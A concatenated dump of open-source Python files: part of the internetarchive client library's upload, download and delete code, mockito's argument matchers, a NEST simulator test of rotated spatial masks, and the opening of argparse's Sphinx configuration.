monkey.patch_socket()
from gevent.pool import Pool
pool = Pool()
except ImportError:
raise ImportError(
"""No module named gevent
Downloading files concurrently requires the gevent neworking library.
gevent and all of it's dependencies can be installed with pip:
\tpip install cython git+git://github.com/surfly/gevent.git@1.0rc2#egg=gevent
""")
files = self.iter_files()
if source:
files = self.get_files(source=source)
if formats:
files = self.get_files(formats=formats)
if glob_pattern:
files = self.get_files(glob_pattern=glob_pattern)
if not files and verbose:
sys.stdout.write(' no matching files found, nothing downloaded.\n')
for f in files:
fname = f.name.encode('utf-8')
if no_directory:
path = fname
else:
path = os.path.join(self.identifier, fname)
if dry_run:
sys.stdout.write(f.url + '\n')
continue
if concurrent:
pool.spawn(f.download, path, verbose, ignore_existing, checksum, destdir)
else:
f.download(path, verbose, ignore_existing, checksum, destdir)
if concurrent:
pool.join()
return True
# modify_metadata()
# ____________________________________________________________________________________
def modify_metadata(self, metadata, target=None, append=False, priority=None,
access_key=None, secret_key=None, debug=False):
"""Modify the metadata of an existing item on Archive.org.
Note: The Metadata Write API does not yet comply with the
latest Json-Patch standard. It currently complies with `version 02
<https://tools.ietf.org/html/draft-ietf-appsawg-json-patch-02>`__.
:type metadata: dict
:param metadata: Metadata used to update the item.
:type target: str
:param target: (optional) Set the metadata target to update.
:type priority: int
:param priority: (optional) Set task priority.
Usage::
>>> import internetarchive
>>> item = internetarchive.Item('mapi_test_item1')
>>> md = dict(new_key='new_value', foo=['bar', 'bar2'])
>>> item.modify_metadata(md)
:rtype: dict
:returns: A dictionary containing the status_code and response
returned from the Metadata API.
"""
access_key = self.session.access_key if not access_key else access_key
secret_key = self.session.secret_key if not secret_key else secret_key
target = 'metadata' if target is None else target
url = '{protocol}//archive.org/metadata/{identifier}'.format(**self.__dict__)
request = iarequest.MetadataRequest(
url=url,
metadata=metadata,
source_metadata=self._json.get(target.split('/')[0], {}),
target=target,
priority=priority,
access_key=access_key,
secret_key=secret_key,
append=append,
)
if debug:
return request
prepared_request = request.prepare()
resp = self.http_session.send(prepared_request)
self._json = self.get_metadata()
return resp
# s3_is_overloaded()
# ____________________________________________________________________________________
def s3_is_overloaded(self, access_key=None):
u = 'http://s3.us.archive.org'
p = dict(
check_limit=1,
accesskey=access_key,
bucket=self.identifier,
)
r = self.http_session.get(u, params=p)
j = r.json()
if j.get('over_limit') == 0:
return False
else:
return True
# upload_file()
# ____________________________________________________________________________________
def upload_file(self, body, key=None, metadata=None, headers=None,
access_key=None, secret_key=None, queue_derive=True,
ignore_preexisting_bucket=False, verbose=False, verify=True,
checksum=False, delete=False, retries=None, retries_sleep=None,
debug=False, **kwargs):
"""Upload a single file to an item. The item will be created
if it does not exist.
:type body: Filepath or file-like object.
:param body: File or data to be uploaded.
:type key: str
:param key: (optional) Remote filename.
:type metadata: dict
:param metadata: (optional) Metadata used to create a new item.
:type headers: dict
:param headers: (optional) Add additional IA-S3 headers to request.
:type queue_derive: bool
:param queue_derive: (optional) Set to False to prevent an item from
being derived after upload.
:type ignore_preexisting_bucket: bool
:param ignore_preexisting_bucket: (optional) Destroy and respecify the
metadata for an item
:type verify: bool
:param verify: (optional) Verify local MD5 checksum matches the MD5
checksum of the file received by IAS3.
:type checksum: bool
:param checksum: (optional) Skip based on checksum.
:type delete: bool
:param delete: (optional) Delete local file after the upload has been
successfully verified.
:type retries: int
:param retries: (optional) Number of times to retry the given request
if S3 returns a 503 SlowDown error.
:type retries_sleep: int
:param retries_sleep: (optional) Amount of time to sleep between
``retries``.
:type verbose: bool
:param verbose: (optional) Print progress to stdout.
:type debug: bool
:param debug: (optional) Set to True to print headers to stdout, and
exit without sending the upload request.
Usage::
>>> import internetarchive
>>> item = internetarchive.Item('identifier')
>>> item.upload_file('/path/to/image.jpg',
... key='photos/image1.jpg')
True
"""
# Defaults for empty params.
headers = {} if headers is None else headers
metadata = {} if metadata is None else metadata
access_key = self.session.access_key if access_key is None else access_key
secret_key = self.session.secret_key if secret_key is None else secret_key
retries = 0 if retries is None else retries
retries_sleep = 30 if retries_sleep is None else retries_sleep
if not hasattr(body, 'read'):
body = open(body, 'rb')
if not metadata.get('scanner'):
scanner = 'Internet Archive Python library {0}'.format(__version__)
metadata['scanner'] = scanner
try:
body.seek(0, os.SEEK_END)
size = body.tell()
body.seek(0, os.SEEK_SET)
except IOError:
size = None
if not headers.get('x-archive-size-hint'):
headers['x-archive-size-hint'] = size
key = body.name.split('/')[-1] if key is None else key
base_url = '{protocol}//s3.us.archive.org/{identifier}'.format(**self.__dict__)
url = '{base_url}/{key}'.format(base_url=base_url, key=urllib.parse.quote(key))
# Skip based on checksum.
md5_sum = utils.get_md5(body)
ia_file = self.get_file(key)
if (checksum) and (not self.tasks) and (ia_file) and (ia_file.md5 == md5_sum):
log.info('{f} already exists: {u}'.format(f=key, u=url))
if verbose:
sys.stdout.write(' {f} already exists, skipping.\n'.format(f=key))
if delete:
log.info(
'{f} successfully uploaded to https://archive.org/download/{i}/{f} '
'and verified, deleting '
'local copy'.format(i=self.identifier, f=key)
)
os.remove(body.name)
# Return an empty response object if checksums match.
# TODO: Is there a better way to handle this?
return Response()
# require the Content-MD5 header when delete is True.
if verify or delete:
headers['Content-MD5'] = md5_sum
# Delete retries and sleep_retries from kwargs.
if 'retries' in kwargs:
del kwargs['retries']
if 'retries_sleep' in kwargs:
del kwargs['retries_sleep']
def _build_request():
body.seek(0, os.SEEK_SET)
if verbose:
try:
chunk_size = 1048576
expected_size = size/chunk_size + 1
chunks = utils.chunk_generator(body, chunk_size)
progress_generator = progress.bar(chunks, expected_size=expected_size,
label=' uploading {f}: '.format(f=key))
data = utils.IterableToFileAdapter(progress_generator, size)
except:
sys.stdout.write(' uploading {f}: '.format(f=key))
data = body
else:
data = body
request = iarequest.S3Request(
method='PUT',
url=url,
headers=headers,
data=data,
metadata=metadata,
access_key=access_key,
secret_key=secret_key,
queue_derive=queue_derive,
**kwargs
)
return request
if debug:
return _build_request()
else:
try:
error_msg = ('s3 is overloaded, sleeping for '
'{0} seconds and retrying. '
'{1} retries left.'.format(retries_sleep, retries))
while True:
if retries > 0:
if self.s3_is_overloaded(access_key):
time.sleep(retries_sleep)
log.info(error_msg)
if verbose:
sys.stderr.write(' warning: {0}\n'.format(error_msg))
retries -= 1
continue
request = _build_request()
prepared_request = request.prepare()
response = self.http_session.send(prepared_request, stream=True)
if (response.status_code == 503) and (retries > 0):
log.info(error_msg)
if verbose:
sys.stderr.write(' warning: {0}\n'.format(error_msg))
time.sleep(retries_sleep)
retries -= 1
continue
else:
if response.status_code == 503:
log.info('maximum retries exceeded, upload failed.')
break
response.raise_for_status()
log.info('uploaded {f} to {u}'.format(f=key, u=url))
if delete and response.status_code == 200:
log.info(
'{f} successfully uploaded to '
'https://archive.org/download/{i}/{f} and verified, deleting '
'local copy'.format(i=self.identifier, f=key)
)
os.remove(body.name)
return response
except HTTPError as exc:
error_msg = (' error uploading {0} to {1}, '
'{2}'.format(key, self.identifier, exc))
log.error(error_msg)
if verbose:
sys.stderr.write(error_msg + '\n')
# Raise HTTPError with error message.
raise type(exc)(error_msg)
# upload()
# ____________________________________________________________________________________
def upload(self, files, **kwargs):
"""Upload files to an item. The item will be created if it
does not exist.
:type files: list
:param files: The filepaths or file-like objects to upload.
:type kwargs: dict
:param kwargs: The keyword arguments from the call to
upload_file().
Usage::
>>> import internetarchive
>>> item = internetarchive.Item('identifier')
>>> md = dict(mediatype='image', creator='Jake Johnson')
>>> item.upload('/path/to/image.jpg', metadata=md, queue_derive=False)
True
:rtype: bool
:returns: True if the request was successful and all files were
uploaded, False otherwise.
"""
def iter_directory(directory):
for path, dir, files in os.walk(directory):
for f in files:
filepath = os.path.join(path, f)
key = os.path.relpath(filepath, directory)
yield (filepath, key)
if isinstance(files, dict):
files = files.items()
if not isinstance(files, (list, tuple)):
files = [files]
queue_derive = kwargs.get('queue_derive', True)
responses = []
file_index = 0
for f in files:
file_index += 1
if isinstance(f, six.string_types) and os.path.isdir(f):
fdir_index = 0
for filepath, key in iter_directory(f):
# Set derive header if queue_derive is True,
# and this is the last request being made.
fdir_index += 1
if queue_derive is True and file_index >= len(files) \
and fdir_index >= len(os.listdir(f)):
kwargs['queue_derive'] = True
else:
kwargs['queue_derive'] = False
if not f.endswith('/'):
key = '{0}/{1}'.format(f, key)
resp = self.upload_file(filepath, key=key, **kwargs)
responses.append(resp)
else:
# Set derive header if queue_derive is True,
# and this is the last request being made.
if queue_derive is True and file_index >= len(files):
kwargs['queue_derive'] = True
else:
kwargs['queue_derive'] = False
if not isinstance(f, (list, tuple)):
key, body = (None, f)
else:
key, body = f
if key and not isinstance(key, six.string_types):
raise ValueError('Key must be a string.')
resp = self.upload_file(body, key=key, **kwargs)
responses.append(resp)
return responses
# File class
# ________________________________________________________________________________________
class File(object):
"""This class represents a file in an archive.org item. You
can use this class to access the file metadata::
>>> import internetarchive
>>> item = internetarchive.Item('stairs')
>>> file = internetarchive.File(item, 'stairs.avi')
>>> print(f.format, f.size)
(u'Cinepack', u'3786730')
Or to download a file::
>>> file.download()
>>> file.download('fabulous_movie_of_stairs.avi')
This class also uses IA's S3-like interface to delete a file
from an item. You need to supply your IAS3 credentials in
environment variables in order to delete::
>>> file.delete(access_key='Y6oUrAcCEs4sK8ey',
... secret_key='youRSECRETKEYzZzZ')
You can retrieve S3 keys here: `https://archive.org/account/s3.php
<https://archive.org/account/s3.php>`__
"""
# init()
# ____________________________________________________________________________________
def __init__(self, item, name):
"""
:type item: Item
:param item: The item that the file is part of.
:type name: str
:param name: The filename of the file.
"""
_file = {}
for f in item.files:
if f.get('name') == name:
_file = f
break
self._item = item
self.identifier = item.identifier
self.name = None
self.size = None
self.source = None
self.format = None
self.md5 = None
self.mtime = None
for key in _file:
setattr(self, key, _file[key])
self.mtime = float(self.mtime) if self.mtime else 0
self.size = int(self.size) if self.size else 0
base_url = '{protocol}//archive.org/download/{identifier}'.format(**item.__dict__)
self.url = '{base_url}/{name}'.format(base_url=base_url,
name=urllib.parse.quote(name.encode('utf-8')))
# __repr__()
# ____________________________________________________________________________________
def __repr__(self):
return ('File(identifier={identifier!r}, '
'filename={name!r}, '
'size={size!r}, '
'source={source!r}, '
'format={format!r})'.format(**self.__dict__))
# download()
# ____________________________________________________________________________________
def download(self, file_path=None, verbose=None, ignore_existing=None, checksum=None,
destdir=None):
"""Download the file into the current working directory.
:type file_path: str
:param file_path: Download file to the given file_path.
:type ignore_existing: bool
:param ignore_existing: Overwrite local files if they already
exist.
:type checksum: bool
:param checksum: Skip downloading file based on checksum.
"""
verbose = False if verbose is None else verbose
ignore_existing = False if ignore_existing is None else ignore_existing
checksum = False if checksum is None else checksum
file_path = self.name if not file_path else file_path
if destdir:
if not os.path.exists(destdir):
os.mkdir(destdir)
if os.path.isfile(destdir):
raise IOError('{} is not a directory!'.format(destdir))
file_path = os.path.join(destdir, file_path)
# Skip based on mtime and length if no other clobber/skip options specified.
if os.path.exists(file_path) and ignore_existing is False and checksum is False:
st = os.stat(file_path)
if (st.st_mtime == self.mtime) and (st.st_size == self.size) \
or self.name.endswith('_files.xml') and st.st_size != 0:
if verbose:
print(' skipping {0}: already exists.'.format(file_path))
log.info('not downloading file {0}, '
'file already exists.'.format(file_path))
return
if os.path.exists(file_path):
if ignore_existing is False and checksum is False:
raise IOError('file already downloaded: {0}'.format(file_path))
if checksum:
md5_sum = utils.get_md5(open(file_path))
if md5_sum == self.md5:
log.info('not downloading file {0}, '
'file already exists based on checksum.'.format(file_path))
if verbose:
sys.stdout.write(' skipping {0}: already exists based on checksum.\n'.format(file_path))
return
if verbose:
sys.stdout.write(' downloading: {0}\n'.format(file_path))
parent_dir = os.path.dirname(file_path)
if parent_dir != '' and not os.path.exists(parent_dir):
os.makedirs(parent_dir)
try:
response = self._item.http_session.get(self.url, stream=True)
response.raise_for_status()
except HTTPError as e:
raise HTTPError('error downloading {0}, {1}'.format(self.url, e))
with open(file_path, 'wb') as f:
for chunk in response.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
f.flush()
# Set mtime with mtime from files.xml.
os.utime(file_path, (0, self.mtime))
log.info('downloaded {0}/{1} to {2}'.format(self.identifier,
self.name.encode('utf-8'),
file_path))
# delete()
# ____________________________________________________________________________________
def delete(self, debug=False, verbose=False, cascade_delete=False, access_key=None,
secret_key=None):
"""Delete a file from the Archive. Note: Some files -- such as
<itemname>_meta.xml -- cannot be deleted.
:type debug: bool
:param debug: Set to True to print headers to stdout and exit
exit without sending the delete request.
:type verbose: bool
:param verbose: Print actions to stdout.
:type cascade_delete: bool
:param cascade_delete: Also deletes files derived from the file,
and files the file was derived from.
"""
url = 'http://s3.us.archive.org/{0}/{1}'.format(self.identifier,
self.name.encode('utf-8'))
access_key = self._item.session.access_key if not access_key else access_key
secret_key = self._item.session.secret_key if not secret_key else secret_key
request = iarequest.S3Request(
method='DELETE',
url=url,
headers={'x-archive-cascade-delete': int(cascade_delete)},
access_key=access_key,
secret_key=secret_key
)
if debug:
return request
else:
if verbose:
msg = ' deleting: {0}'.format(self.name.encode('utf-8'))
if cascade_delete:
msg += ' and all derivative files.\n'
else:
msg += '\n'
sys.stdout.write(msg)
prepared_request = request.prepare()
return self._item.http_session.send(prepared_request)
| agpl-3.0 |
mriehl/mockito-without-hardcoded-distribute-version | mockito-0.5.2/mockito/matchers.py | 3 | 2261 | # Copyright (c) 2008-2013 Szczepan Faber, Serhiy Oplakanets, Herr Kaste
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''Matchers for stubbing and verifications.
Common matchers for use in stubbing and verifications.
'''
__all__ = ['any', 'contains', 'times']
class Matcher:
def matches(self, arg):
pass
class Any(Matcher):
def __init__(self, wanted_type=None):
self.wanted_type = wanted_type
def matches(self, arg):
if self.wanted_type:
return isinstance(arg, self.wanted_type)
else:
return True
def __repr__(self):
return "<Any: %s>" % self.wanted_type
class Contains(Matcher):
def __init__(self, sub):
self.sub = sub
def matches(self, arg):
if not hasattr(arg, 'find'):
return
return self.sub and len(self.sub) > 0 and arg.find(self.sub) > -1
def __repr__(self):
return "<Contains: '%s'>" % self.sub
def any(wanted_type=None):
"""Matches any() argument OR any(SomeClass) argument
Examples:
when(mock).foo(any()).thenReturn(1)
verify(mock).foo(any(int))
"""
return Any(wanted_type)
def contains(sub):
return Contains(sub)
def times(count):
return count
| mit |
alberto-antonietti/nest-simulator | pynest/nest/tests/test_spatial/test_rotated_rect_mask.py | 20 | 16421 | # -*- coding: utf-8 -*-
#
# test_rotated_rect_mask.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Tests rotated rectangular and box masks.
"""
import unittest
import nest
class RotatedRectangularMask(unittest.TestCase):
def setUp(self):
nest.ResetKernel()
def test_RotatedRectangularMask(self):
"""Test rotated rectangular mask.
We have:
lower_left: [-1., -0.5]
upper_right: [ 1., 0.5]
So, if we have:
layer:
2 7 12 17 22
3 8 13 18 23
4 9 14 19 24
5 10 15 20 25
6 11 16 21 26
and have azimuth_angle = 0, we should get node IDs 9, 14, 19 if we
select node IDs by mask.
If we have azimuth_angle = 90, we should get node IDs 13, 14, 15.
"""
# Test 2D layer
layer = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[5, 5],
extent=[5., 5.]))
# First test without rotation.
maskdict = {'lower_left': [-1., -0.5], 'upper_right': [1., 0.5]}
mask = nest.CreateMask('rectangular', maskdict)
cntr = [0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((8, 13, 18,)))
# Test if we get correct node IDs when rotating 90 degrees.
maskdict = {'lower_left': [-1., -0.5],
'upper_right': [1., 0.5],
'azimuth_angle': 90.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((12, 13, 14,)))
# Test rotation with an azimuth angle of 45 degrees.
maskdict = {'lower_left': [-1.5, -0.5],
'upper_right': [1.5, 0.5],
'azimuth_angle': 45.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((9, 13, 17,)))
# Test rotation with an azimuth angle of 135 degrees.
maskdict = {'lower_left': [-1.5, -0.5],
'upper_right': [1.5, 0.5],
'azimuth_angle': 135.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((7, 13, 19,)))
# Test that an error is raised if we send in a polar angle to a 2D
# mask.
maskdict = {'lower_left': [-1.5, -0.5],
'upper_right': [1.5, 0.5],
'polar_angle': 45.0}
with self.assertRaises(nest.kernel.NESTError):
mask = nest.CreateMask('rectangular', maskdict)
def test_RotatedBoxMaskByAzimuthAngle(self):
"""Test rotated box mask with azimuth angle."""
# Test a 3D layer.
pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
for y in range(-2, 3)
for z in range(-2, 3)]
layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))
# First test that we get correct node IDs with box mask that is not
# rotated.
maskdict = {'lower_left': [-1., -0.5, -0.5],
'upper_right': [1., 0.5, 0.5]}
mask = nest.CreateMask('box', maskdict)
cntr = [0., 0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((38, 63, 88,)))
# Test with a larger box mask.
maskdict = {'lower_left': [-1., -0.5, -1.],
'upper_right': [1., 0.5, 1.]}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([37, 38, 39, 62, 63, 64, 87, 88, 89]))
# Test the smaller box mask with a rotation of 90 degrees. Only test
# the azimuth angle, not the polar angle.
maskdict = {'lower_left': [-1., -0.5, -0.5],
'upper_right': [1., 0.5, 0.5],
'azimuth_angle': 90.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((58, 63, 68,)))
# Test rotation of the larger box with an azimuth angle of 90 degrees.
maskdict = {'lower_left': [-1., -0.5, -1.],
'upper_right': [1., 0.5, 1.],
'azimuth_angle': 90.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([57, 58, 59, 62, 63, 64, 67, 68, 69]))
def test_RotatedBoxMaskByPolarAngle(self):
"""Test rotated box mask with polar angle."""
pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
for y in range(-2, 3)
for z in range(-2, 3)]
layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))
# First test without rotation
maskdict = {'lower_left': [-0.5, -1.0, -1.0],
'upper_right': [0.5, 1.0, 1.0]}
mask = nest.CreateMask('box', maskdict)
cntr = [0., 0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([57, 58, 59, 62, 63, 64, 67, 68, 69]))
# Test with a polar angle of 90 degrees.
maskdict = {'lower_left': [-0.5, -1.0, -1.0],
'upper_right': [0.5, 1.0, 1.0],
'polar_angle': 90.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([33, 38, 43, 58, 63, 68, 83, 88, 93]))
# Test with a polar angle of 180 degrees, should be the same as the
# one without a polar angle.
maskdict = {'lower_left': [-0.5, -1.0, -1.0],
'upper_right': [0.5, 1.0, 1.0],
'polar_angle': 180.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([57, 58, 59, 62, 63, 64, 67, 68, 69]))
# Test with a polar angle of 45 degrees.
maskdict = {'lower_left': [-0.5, -1.5, -1.5],
'upper_right': [0.5, 1.5, 1.5],
'polar_angle': 45.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([32, 37, 42, 58, 63, 68, 84, 89, 94]))
# Test with a polar angle of 135 degrees. The node IDs should be
# perpendicular to the ones obtained by a polar angle of 45 degrees.
maskdict = {'lower_left': [-0.5, -1.5, -1.5],
'upper_right': [0.5, 1.5, 1.5],
'polar_angle': 135.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([34, 39, 44, 58, 63, 68, 82, 87, 92]))
# Test two symmetric masks in x and z direction. One with no polar
# angle and one with a polar angle of 90 degrees. As the masks are
# symmetrical in x and z, a polar angle of 90 degrees should give the
# same node IDs as the one without a polar angle.
maskdict = {'lower_left': [-1., -0.5, -1.],
'upper_right': [1., 0.5, 1.]}
mask = nest.CreateMask('box', maskdict)
node_ids_2 = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids_2, nest.NodeCollection([37, 38, 39, 62, 63, 64, 87, 88, 89]))
maskdict = {'lower_left': [-1., -0.5, -1.],
'upper_right': [1., 0.5, 1.],
'polar_angle': 90.}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([37, 38, 39, 62, 63, 64, 87, 88, 89]))
self.assertEqual(node_ids_2, node_ids)
def test_RotatedBoxMaskByAzimuthAndPolarAngle(self):
"""Test rotated box mask with azimuth and polar angle."""
pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
for y in range(-2, 3)
for z in range(-2, 3)]
layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))
# Test with a azimuth angle and polar angle of 45 degrees.
maskdict = {'lower_left': [-0.5, -1.5, -1.5],
'upper_right': [0.5, 1.5, 1.5],
'azimuth_angle': 45.,
'polar_angle': 45.}
mask = nest.CreateMask('box', maskdict)
cntr = [0., 0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection([37, 38, 43, 57, 58, 63, 68, 69, 83, 88, 89]))
def test_RotatedRectangleOutsideOrigin(self):
"""
Test rotated rectangle where the mask does not contain the origin.
"""
layer = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[11, 11],
extent=[11., 11.]))
# First test that we get the correct node IDs when our mask does not
# contain the origin.
maskdict = {'lower_left': [1., 1.], 'upper_right': [4., 2.]}
mask = nest.CreateMask('rectangular', maskdict)
cntr = [0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((70, 71, 81, 82, 92, 93, 103, 104,)))
# Then test that we get the correct node IDs with a azimuth rotation angle
# of 45 degrees when the mask does not contain the origin.
maskdict = {'lower_left': [0.5, 0.5],
'upper_right': [4.5, 2.5],
'azimuth_angle': 45.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((71, 81, 82, 83, 91, 92, 93, 103,)))
# Test that we get the correct node IDs with a azimuth rotation angle
# of 90 degrees when the mask does not contain the origin.
maskdict = {'lower_left': [1.0, 1.0],
'upper_right': [4.0, 2.0],
'azimuth_angle': 90.0}
mask = nest.CreateMask('rectangular', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((80, 81, 82, 83, 91, 92, 93, 94,)))
def test_RotatedBoxOutsideOrigin(self):
"""Test rotated box where the mask does not contain the origin."""
pos = [[x * 1., y * 1., z * 1.] for x in range(-2, 3)
for y in range(-2, 3)
for z in range(-2, 3)]
layer = nest.Create('iaf_psc_alpha', positions=nest.spatial.free(pos))
# First test that we get the correct node IDs when our mask does not
# contain the origin.
maskdict = {'lower_left': [-2.0, -1.0, 0.5],
'upper_right': [-0.5, -0.5, 2.0]}
mask = nest.CreateMask('box', maskdict)
cntr = [0., 0., 0.]
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((9, 10, 34, 35,)))
# Test that we get the correct node IDs with a azimuth rotation angle of 45
# degrees when the mask does not contain the origin.
maskdict = {'lower_left': [-2.5, -1.0, 0.5],
'upper_right': [-0.5, -0.5, 2.5],
'azimuth_angle': 45.0}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((9, 10, 39, 40,)))
# Test that we get the correct node IDs with a polar rotation angle of 45
# degrees when the mask does not contain the origin.
maskdict = {'lower_left': [-1.5, -2.5, 0.5],
'upper_right': [-1.0, -0.5, 2.5],
'polar_angle': 45.0}
mask = nest.CreateMask('box', maskdict)
node_ids = nest.SelectNodesByMask(layer, cntr, mask)
self.assertEqual(node_ids, nest.NodeCollection((4, 9, 30, 35,)))
def test_ConnectWithRotatedRectangleMask(self):
"""Test connection with rotated rectangle mask.
We have: lower_left = [-1.5, -0.5]
upper_right = [ 1.5, 0.5]
azimuth_angle = 45 degrees
Each source node should then connect to:
- The node in the same position in target layer
- The node above the node to the right of that position
- The node below the node to the left of the position.
So, if we have
sources: targets:
2 7 12 17 22 28 33 38 43 48
3 8 13 18 23 29 34 39 44 49
4 9 14 19 24 30 35 40 45 50
5 10 15 20 25 31 36 41 46 51
6 11 16 21 26 32 37 42 47 52
some example connections will be:
______
/ /
2 -> / 28 /
/ /
/_______ /
_______
/ 44 /
14 -> / 40 /
/ 36 /
/_______ /
"""
source = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[5, 5],
extent=[5., 5.]))
target = nest.Create('iaf_psc_alpha',
positions=nest.spatial.grid(shape=[5, 5],
extent=[5., 5.]))
conndict = {'rule': 'pairwise_bernoulli',
'p': 1.,
'mask': {'rectangular': {'lower_left': [-1.5, -0.5],
'upper_right': [1.5, 0.5],
'azimuth_angle': 45.}}}
nest.Connect(source, target, conndict)
ref = [[1, 26], [2, 27], [2, 31], [3, 28], [3, 32], [4, 29], [4, 33],
[5, 30], [5, 34], [6, 27], [6, 31], [7, 28], [7, 32], [7, 36],
[8, 29], [8, 33], [8, 37], [9, 30], [9, 34], [9, 38], [10, 35],
[10, 39], [11, 32], [11, 36], [12, 33], [12, 37], [12, 41],
[13, 34], [13, 38], [13, 42], [14, 35], [14, 39], [14, 43],
[15, 40], [15, 44], [16, 37], [16, 41], [17, 38], [17, 42],
[17, 46], [18, 39], [18, 43], [18, 47], [19, 40], [19, 44],
[19, 48], [20, 45], [20, 49], [21, 42], [21, 46], [22, 43],
[22, 47], [23, 44], [23, 48], [24, 45], [24, 49], [25, 50]]
conns = nest.GetConnections()
connections = [[s, t] for s, t in zip(conns.sources(), conns.targets())]
for conn, conn_ref in zip(sorted(connections), ref):
self.assertEqual(conn, conn_ref)
def suite():
suite = unittest.makeSuite(RotatedRectangularMask, 'test')
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite())
| gpl-2.0 |
mozilla/fjord | vendor/packages/argparse-1.3.0/doc/source/conf.py | 84 | 7470 | # -*- coding: utf-8 -*-
#
# argparse documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 27 01:27:16 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'argparse'
copyright = u'2011, Steven J. Bethard'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2'
